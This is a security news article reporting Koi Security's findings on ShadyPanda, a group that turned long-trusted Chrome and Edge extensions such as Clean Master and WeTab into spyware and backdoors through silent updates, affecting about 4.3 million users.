A threat group dubbed ShadyPanda spent seven years uploading seemingly legitimate extensions into browser marketplaces, building trust among its growing number of users before weaponizing the extensions with silently deployed malicious updates.

The result was 4.3 million Chrome and Edge users infected in the campaign – 300,000 users spanning five extensions, including Clean Master, and another 4 million victims of a parallel spyware campaign that involved another five Microsoft Edge extensions from the same publisher, according to researchers with Koi Security.

Among those Edge extensions was WeTab, which itself accounted for 3 million downloads.

The campaigns weren’t the result of technological expertise, Koi security researcher Tuval Admoni wrote in a report this week. ShadyPanda exploited the traditional process that marketplaces use for extensions.

“One patient threat actor and one lesson: Trust is the vulnerability,” Admoni wrote. “ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago – static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn’t catch this.”

Legitimacy First, Weaponization Later

The bad actors got into the marketplaces by developing and uploading legitimate extensions, then put in the malicious updates, knowing that no one was keeping an eye on what happened after that.

“The systemic problem isn’t just one malicious actor,” he wrote. “It’s that the security model incentivizes this behavior. … The strategy: build trust, accumulate users, then weaponize via a single update.”

The Long Game

Koi pointed to two operations being run by ShadyPanda. One involves five extensions that were uploaded into marketplaces, including three that were uploaded in 2018 and 2019. One of those was Clean Master, which had more than 200,000 installs. They all operated legitimately for years, to the point that Clean Master gained “Featured” and “Verified” status, adding to its legitimacy.

Before the extensions were weaponized, ShadyPanda deployed covert installation tracking to drive distribution and developed malware for them. In the middle of last year, “after accumulating 300,000+ installs, ShadyPanda pushed the malicious update,” Admoni wrote. “Automatic infection via Chrome and Edge’s trusted auto-update mechanism. All five extensions now run identical malware.”

Each infected browser runs a remote code execution (RCE) that every hour checks back with ShandyPanda for instructions and downloads arbitrary JavaScript. It then executes the instructions, armed with full browser access.

A Backdoor

“This isn’t malware with a fixed function,” he wrote. “It’s a backdoor. ShadyPanda decides what it does. Today it’s surveillance, tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, hourly, forever.”

It collects a range of information, from user browser history, browser data – such as language and platforms used, time zones, and screen resolution – web navigation patterns, timestamps that can be used for profiling, and encrypted data with AES.

The malware can run man-in-the-middle attacks, intercepting and modifying traffic on the network, replacing legitimate JavaScript files with malicious versions, stealing credentials, hijacking sessions, and injecting content into websites. It also can dodge analysis by researchers, switching to benign behavior if developer tools are opened.

The code also is obfuscated, with shortened variable names, and is executed to bypass content security policies.

“ShadyPanda can update any of these capabilities hourly,” Admoni wrote. “Even though the extensions were recently removed from marketplaces, the infrastructure for full-scale attacks remains deployed on all infected browsers.”

Surveillance Operation

The second operation by Starlab Technology, the publisher of Clean Master in Edge, was a spyware campaign. Five more extensions were placed on Edge in 2023 and ran up more than 4 million installs. Admoni wrote that the operation was ongoing, but after Koi published its report, Microsoft spokespeople told news outlets that the malicious extensions had been removed from the Edge Add-on store.

Two of the five malicious extensions – including the WeTab New Tab Page – ran as a surveillance platform that appeared to be a productivity tool. Among the information collected are browsing history, search queries, mouse clicks, and browser fingerprints like screen resolution, language, and time zones. The malware also can read localStorage and sessionStorage and access cookies.

Koi found the user data WeTab collects is sent to 17 domains, including 15 in China – eight Baidu servers and seven WeTab servers – as well as Google Analytics.

Google also has told news outlets that the extensions are no longer available on the Chrome Web Store.

Links Between the Campaigns

“What linked all these campaigns together: code signing similarities, overlapping infrastructure, identical obfuscation techniques evolving over time,” Adomi wrote. “ Same actor. Different masks. Each phase learned from the last – from crude affiliate fraud to patient five-year operations.”

He noted that the attack vector was the auto-update mechanism in the marketplacrs that were designed to keep users secure.

“Chrome and Edge’s trusted update pipeline silently delivered malware to users,” he wrote. “No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms.”